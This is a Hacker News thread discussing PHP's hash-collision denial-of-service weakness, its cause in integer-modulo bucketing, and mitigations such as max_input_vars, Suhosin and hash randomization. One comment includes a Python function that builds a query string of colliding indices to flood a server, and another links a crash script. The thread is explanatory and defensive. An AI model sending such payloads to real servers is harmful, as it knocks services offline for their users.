

Supercolliding a PHP array (inserting 65536 elements takes 30 seconds) - nikic
http://nikic.github.com/2011/12/28/Supercolliding-a-PHP-array.html

======
saurik
I think the key thing to realize here is that when PHP says "array", they
apparently mean "ordered map": if you are allowed to have 'foo' as a key, it
is somewhat bothersome to call it an "array". Then, once you realize that it
is actually a hashtable, it is fairly obvious that there will be a worst-case
input set.

~~~
subwindow
Yes, that is just one way in which PHP is annoying. I think they actually
refer to it as an "associative array", which as far as I can tell is exactly a
hash, but they never refer to it as one.

On a side note, Ruby does not appear to have the same problem, since similar
code executes in 0.02 seconds. I think that is probably because Ruby's hash
function is superior.

~~~
dangrossman
Ruby's not immune to this...
<http://www.ocert.org/advisories/ocert-2011-003.html>

~~~
alinajaf
Well hold up a second... quote from that link:

_In the case of the Ruby language, the 1.9.x branch is not affected by the
predictable collision condition since this version includes a randomization of
the hashing function._

So there is some merit to what the commenter is saying, though I doubt he knew
the above.

Actual Ruby arrays (which are arrays and not hashes) will obviously not
exhibit this problem, though.

I think for all practical purposes, unless you're doing something really
weird, the likelihood of hash function collisions is low enough that we don't
need to think too much about it.

~~~
damncabbage

      I think for all practical purposes, unless you're doing
      something really weird, the likelihood of hash function
      collisions is low enough that we don't need to think too
      much about it.
    

Except that, like with PHP, the worrying part is that someone can stuff
colliding keys into rack.request.form_hash or rack.request.query_hash (a la
PHP's $_POST and $_GET).

(Unlike PHP, though, the Ruby community can head off these particular attacks
by releasing a new version of Rack, while waiting for a new 1.8.x release
containing a security patch.)

------
rufibarbatus
> _PHP already landed a change (which will ship with PHP 5.3.9) which will add
> a max_input_vars ini setting which defaults to 1000. This setting determines
> the maximum number of POST/GET variables that are accepted, so now only a
> maximum of 1000 collisions can be created._

Wait, where did we establish that less user input = less array insertions?

~~~
subwindow
I think the most obvious exploit path is using thousands of query parameters,
which are inserted into an "array" in PHP.
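
To make that exploit path concrete, here is a hypothetical Python sketch of
how an attacker might build such a request (the parameter name `a`, the table
size, and the helper name are all invented for illustration):

```python
# Sketch: build a query string whose integer array indices all collide in a
# chained hash table of the given power-of-two size. Illustrative only.
from urllib.parse import urlencode

def evil_query(table_size=2 ** 16, count=1000):
    # Indices 0, size, 2*size, ... are all congruent to 0 mod table_size,
    # so a table that hashes integers as "key mod size" puts every one of
    # them in the same bucket.
    return urlencode([(f"a[{i * table_size}]", "x") for i in range(count)])

print(evil_query(count=3))  # a%5B0%5D=x&a%5B65536%5D=x&a%5B131072%5D=x
```

Sending a POST body like this makes the framework itself perform the
worst-case insertions while parsing the parameters, before any application
code runs.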

An ini setting seems like a terrible and incomplete fix to the problem.

~~~
maratd
> An ini setting seems like a terrible and incomplete fix to the problem.

Why? It solves the problem entirely.

~~~
subwindow
It only solves the exploit path, not the vulnerability.

The true issue is that their hashing algorithm sucks. Any patch that doesn't
fix the hashing algorithm is a band-aid and not a true fix.

~~~
nikic
It is somewhat risky to _fundamentally_ change the hashing algorithm late in
the release cycle (RC4); it is bound to cause problems. The ini option
prevents the obvious threat without making deep changes to the core.

------
jamesmoss
If you're running a version of PHP which is patched with Suhosin
(<http://www.hardened-php.net/suhosin/>) you'll already be protected from the
DoS vector outlined in the article. By default Suhosin limits the max number
of $_GET/$_POST/$_COOKIE parameters to 200.

------
bluesnowmonkey
> _So if we insert a total of 64 elements, the first one 0, the second one 64,
> the third one 128, the fourth one 192, etc., all of those elements will have
> the same hash (namely 0) and all will be put into the same linked list._

This doesn't seem correct, or I'm missing something.

Upon the first insertion, PHP doesn't know that you intend to insert 63 more
elements. It shouldn't allocate a 2^6-element underlying array until it
exceeds 2^5 elements, right? So the first 2^5 insertions would be constant
time, and only the next 2^5 would be linear.

I'm not sure how PHP performs the reallocation to increase an array's
capacity. Maybe it allocates a blank array, and then inserts the existing
elements using the standard insertion algorithm. In that case 2^6 linear-time
insertions _would_ occur -- half during the reallocation, and half afterwards.
But it still bears mentioning that performance wouldn't tank until you
inserted half+1 of the values.

~~~
jgeralnik
It's not really an array, it's a hash table. When you insert an item it
doesn't simply put it in a previously allocated array, but places it at the
end of a linked list in the correct bucket determined by the hash. In order to
check if the key has already been used the list must be traversed each time,
and so insertion becomes a linear operation.
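
A minimal Python sketch of that mechanism (a toy chained table, not PHP's
actual implementation): each insert must walk the bucket's chain to check
whether the key already exists, so n all-colliding inserts cost on the order
of n^2 comparisons in total.

```python
class ChainedTable:
    """Toy chained hash table: hash(key) = key mod table size."""

    def __init__(self, size=8):
        self.buckets = [[] for _ in range(size)]
        self.probes = 0  # counts key comparisons, to expose the O(n) scan

    def insert(self, key, value):
        bucket = self.buckets[key % len(self.buckets)]
        for pair in bucket:          # must scan: the key may already exist
            self.probes += 1
            if pair[0] == key:
                pair[1] = value      # key found: update in place
                return
        bucket.append([key, value])  # key not found: append to the chain

t = ChainedTable(size=8)
for i in range(100):
    t.insert(i * 8, "x")   # every key hashes to bucket 0
print(t.probes)            # 0 + 1 + ... + 99 = 4950 comparisons
```

With well-distributed keys the chains stay short and the same 100 inserts do
almost no comparisons at all.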

------
peteretep
Wait, what? Didn't we fix this in Perl forever (8 years) ago? Didn't everyone
else fix it at the same time?

[http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec...](http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003/index.html)

How is any modern programming language still vulnerable to this?!

------
kmm
I could see lookup becoming slow, but why is insertion affected? Isn't
insertion into a linked list an O(1) operation?

~~~
nikic
Even if the real C array contained a pointer to the last element in the LL
(it does not; it only points to the first), insertion would still be
worst-case O(n): PHP has to check all elements in the LL to ensure that the
element does not exist yet.

Consider this:

    $foo = array();
    $foo['bar'] = 'x';
    $foo['bar'] = 'y';

In this case the second set of the 'bar' index modifies an existing element in
the linked list and is not appended as a new one.

~~~
kmm
Of course! I hadn't considered that inserting an element can mean updating an
already existing element.

In C you don't need a pointer to the last element though, you can just replace
the pointer to the first element with the new element and put the old pointer
in the "next" field of the new element. I usually implement stacks this way.
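
That prepend trick, sketched in Python rather than C (a toy illustration, not
PHP internals):

```python
class Node:
    def __init__(self, value, next_node=None):
        self.value = value
        self.next = next_node

def push(head, value):
    # The new node points at the old head, and the new node becomes the
    # head. No tail pointer is needed: prepending is O(1).
    return Node(value, head)

head = None
for v in (1, 2, 3):
    head = push(head, v)
print(head.value)  # 3 -- last pushed is first out, i.e. stack (LIFO) order
```

As the parent notes, this gives O(1) insertion only because a plain stack
never has to check whether the value is already present.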

------
alastairpat
I just ran this (using the PHP CLI) on my Lion MacBook Air and it took far,
far longer than 30 seconds - 172, to be exact.

Not being at all familiar with the underlying mechanisms, does anybody
understand why it would take so much longer on {PHP 5.3.6, Lion, my MacBook
Air, the PHP CLI}?

~~~
nikic
Different hardware, different results. I ran my tests on an i3 CPU.

I don't know what a MacBook Air uses, but given that it's a notebook probably
something slower :)

~~~
sp332
I know it's hard to believe, but the low-end MBA has a Core i5 processor.
<https://www.apple.com/macbookair/features.html> Apple worked directly with
Intel to get a smaller "package", and soldered it to the mainboard to make it
fit.

------
damncabbage
From the article:

      But there is hope! PHP already landed a change (which
      will ship with PHP 5.3.9) ...

As far as I can tell, this isn't being backported.

This is going to be bad. I've never had the privilege of using PHP 5.3 during
work hours; everything has always been stuck on 5.1.6 and 5.2.x.

Predictions:

a) People are going to jump to 5.3 in a hurry, or

b) RedHat will release a backport for RHEL (and Centos will release the patch
in six months).

Either way, I think this will go unpatched in a large number of systems until
DoS attacks become so common that a) and b) will need to happen.

~~~
nikic
I sure hope that a) is going to happen. PHP 5.2 has been EOL'd (i.e. no
security fixes) for something like a year now; PHP 5.1 even longer.

------
gog
Haven't tested it yet, but I believe that if you use the Suhosin patch you can
limit the number of variables with suhosin.get.max_vars and
suhosin.post.max_vars, so you do not have to wait for PHP to release the
version with the patch (I guess most people do not compile PHP from
Subversion trunk for production usage).

------
asadkn
Using string keys: [https://github.com/koto/blog-kotowicz-net-examples/blob/mast...](https://github.com/koto/blog-kotowicz-net-examples/blob/master/hashcollision/crash.php) (base 5?)

Didn't check in details yet but it might be interesting for the curious kind.

------
zerothehero
This is cool, can someone do the same for Python? (And other languages?)

~~~
Deestan
Yes. This is a trivial exploit of a _designed_ weakness in hashtables.

I shall, arrogant as I am, scoff at people who are surprised when this
happens. I mean, honestly, what kind of developer doesn't know the _basic
properties_ of their data structures?

~~~
mdwrigh2
Well, this isn't exploitable if you use a randomized hash function like Ruby
1.9 does.

See <http://www.ocert.org/advisories/ocert-2011-003.html> for a listing of
vulnerable languages (and yes, Python is on the list).

~~~
chc
You make it sound like you're somehow disagreeing with him, but what he says
is true even of Ruby's hash algorithm. Introducing randomness into the hash
function is really just a band-aid on this vulnerability. The inherent
vulnerability is there either way; with a randomized hash function, an
attacker just needs a bit of runtime information to mount the same attack.

------
Cyndre
Making a simple change of $size = pow(2, 16); to $size = 65535 removes the
issue entirely.

Inserting 65535 evil elements took 0.030333042144775 seconds

Inserting 65535 good elements took 0.020994901657104 seconds

~~~
lambda
Yes, those are no longer values that will hit the worst-case performance here.

Did you read the article? The reason for the bad performance is that the way
PHP hashes integers is just taking the integer mod the size of the hash
table. So values that are 0 mod the size of the hash table all go into the
same bucket. If your hash table has a size that's a power of 2, then any
multiple of that size (including any sum of powers of two that are each at
least as large as the table size) will hash to 0 and go into the same bucket.
So if you insert a whole bunch of values that increase by a large power of
two, they will all hash to 0 and give you O(n^2) performance.

Note that the size referred to there is being used not only as the size of
the array, but also as the amount to iterate by. By changing that to
something other than a power of 2, you are no longer inserting "evil"
elements.
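
A quick Python check of that arithmetic (illustrative; PHP actually masks
with size - 1, which is equivalent to mod for a power-of-two size):

```python
SIZE = 2 ** 16  # power-of-two table size, as in the article's example

def bucket(key, size=SIZE):
    # For a power-of-two size, key & (size - 1) is the same as key % size,
    # which is effectively how the table picks a bucket for an integer key.
    return key & (size - 1)

evil = [i * SIZE for i in range(5)]  # 0, 65536, 131072, 196608, 262144
good = list(range(5))                # 0, 1, 2, 3, 4
print([bucket(k) for k in evil])     # [0, 0, 0, 0, 0] -- one bucket
print([bucket(k) for k in good])     # [0, 1, 2, 3, 4] -- spread out
```

The "evil" keys all map to bucket 0, while ordinary small keys spread evenly
across the table.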

The point of this article is that it's really, really easy to do a denial of
service attack on PHP arrays by picking array indices that are multiples of a
large power of two. Of course you avoid the problem if you don't use such
indices yourself.

~~~
Cyndre
Very nice explanation. Thanks to you and a few others I now understand what is
happening far better :). Interesting, even at 256 it takes 10 times as long to
insert the evil elements.

Thanks again for helping me understand and learn something new today :)

